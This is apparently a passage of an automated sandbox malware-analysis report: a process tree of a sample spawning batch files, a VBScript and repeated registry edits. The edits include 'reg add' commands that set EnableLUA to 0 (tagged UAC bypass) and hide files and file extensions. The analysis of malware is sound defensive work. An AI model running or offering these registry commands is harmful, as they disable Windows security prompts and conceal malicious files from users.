        65⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        64⤵
        
        PID:4412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        64⤵
        Modifies registry key
        
        PID:4444
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        65⤵
        UAC bypass
        
        PID:636
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        63⤵
        
        PID:1492
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        62⤵
        
        PID:3816
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        62⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vqMIsEkg.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        62⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        63⤵
        
        PID:3956
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        62⤵
        
        PID:2272
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        60⤵
        
        PID:4060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        60⤵
        
        PID:2420
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        60⤵
        
        PID:1220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\daUkwAQg.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        60⤵
        
        PID:1256
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        61⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HAMcYMIs.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        58⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2860
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        59⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        58⤵
        
        PID:1300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        58⤵
        
        PID:4660
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        58⤵
        
        PID:1564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bAgUAMsE.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        56⤵
        
        PID:2800
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        57⤵
        
        PID:3688
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        56⤵
        
        PID:4160
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        56⤵
        
        PID:1312
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        56⤵
        Modifies registry key
        
        PID:1068
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        57⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kUwwkMcU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        54⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        55⤵
        
        PID:1408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        54⤵
        
        PID:3292
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        55⤵
        Modifies visibility of file extensions in Explorer
        
        PID:3412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        54⤵
        
        PID:1804
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        54⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        52⤵
        Modifies registry key
        
        PID:584
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        53⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CeAwAUUI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        52⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        53⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        52⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        52⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        50⤵
        
        PID:4428
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KAYMwooo.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        50⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        51⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        50⤵
        
        PID:3176
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        50⤵
        
        PID:1668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        48⤵
        
        PID:2648
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        48⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        48⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GiYUMcsw.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        48⤵
        
        PID:3236
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        49⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        46⤵
        Modifies registry key
        
        PID:3688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\auokAYMU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        46⤵
        
        PID:1516
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        47⤵
        
        PID:4188
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        46⤵
        UAC bypass
        
        PID:4944
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        46⤵
        
        PID:4728
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        44⤵
        
        PID:216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        44⤵
        Modifies registry key
        
        PID:1084
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vUYggcMU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        44⤵
        
        PID:1184
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        45⤵
        
        PID:2796
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        44⤵
        
        PID:4404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        42⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3904
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rAMsgoYo.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        42⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        43⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        42⤵
        
        PID:1712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        42⤵
        Modifies registry key
        
        PID:4532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        40⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        40⤵
        Modifies registry key
        
        PID:2780
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        40⤵
        
        PID:4416
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PyoUIMgg.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        40⤵
        
        PID:1968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        41⤵
        UAC bypass
        
        PID:8
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        41⤵
        
        PID:3912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nWggwgsM.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        38⤵
        
        PID:2076
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        39⤵
        
        PID:460
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        39⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        38⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        38⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        38⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        36⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:3052
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        36⤵
        
        PID:1172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        36⤵
        Modifies registry key
        
        PID:3852
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WOMccMkU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        36⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        37⤵
        
        PID:1424
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eMwMkAkM.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        34⤵
        Modifies visibility of file extensions in Explorer
        
        PID:2640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2804
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        35⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        34⤵
        
        PID:1088
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        34⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        34⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        32⤵
        
        PID:5044
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WYgoscYI.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        32⤵
        
        PID:4880
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        33⤵
        
        PID:216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        32⤵
        
        PID:4832
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        32⤵
        
        PID:4600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        30⤵
        
        PID:4632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wcAkscEw.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        30⤵
        
        PID:2896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        31⤵
        
        PID:4960
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        31⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        30⤵
        UAC bypass
        Modifies registry key
        
        PID:1724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        30⤵
        Modifies registry key
        
        PID:808
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        28⤵
        
        PID:4100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        28⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        28⤵
        
        PID:1980
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KsYcsksE.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        28⤵
        
        PID:3928
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        29⤵
        
        PID:1668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        26⤵
        
        PID:4696
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        27⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lGgIcIIM.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        26⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        27⤵
        
        PID:2988
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        26⤵
        UAC bypass
        Modifies registry key
        
        PID:2520
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        26⤵
        
        PID:1732
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        24⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        24⤵
        Modifies registry key
        
        PID:1848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        24⤵
        
        PID:4104
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pYEwUAsU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        24⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        25⤵
        
        PID:1068
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        22⤵
        
        PID:636
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RmYgggwc.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        22⤵
        
        PID:1760
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        23⤵
        
        PID:2572
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        22⤵
        
        PID:2112
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        22⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:1108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        20⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:4012
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        20⤵
        Modifies registry key
        
        PID:2952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zMoQcYcA.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        20⤵
        
        PID:4888
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        21⤵
        
        PID:724
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        20⤵
        
        PID:8
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lUksIIME.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        18⤵
        
        PID:1004
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        19⤵
        Suspicious use of WriteProcessMemory
        
        PID:1496
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        19⤵
        
        PID:3224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        18⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:764
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        18⤵
        
        PID:5108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        18⤵
        
        PID:3600
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OMogwkYg.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        16⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2428
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        17⤵
        
        PID:644
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        16⤵
        UAC bypass
        
        PID:2172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        16⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        16⤵
        Modifies visibility of file extensions in Explorer
        
        PID:4288
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        14⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:2920
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        14⤵
        Modifies registry key
        
        PID:4432
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        14⤵
        UAC bypass
        
        PID:3748
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qEUAEwEU.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        14⤵
        
        PID:4696
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        15⤵
        
        PID:460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        12⤵
        
        PID:4676
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        12⤵
        
        PID:2640
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        12⤵
        UAC bypass
        Modifies registry key
        
        PID:1804
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eOQskwss.bat" "C:\Users\Admin\AppData\Local\Temp\993d2674077cd5exeexeexeex.exe""
        12⤵
        
        PID:3412
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        13⤵
        
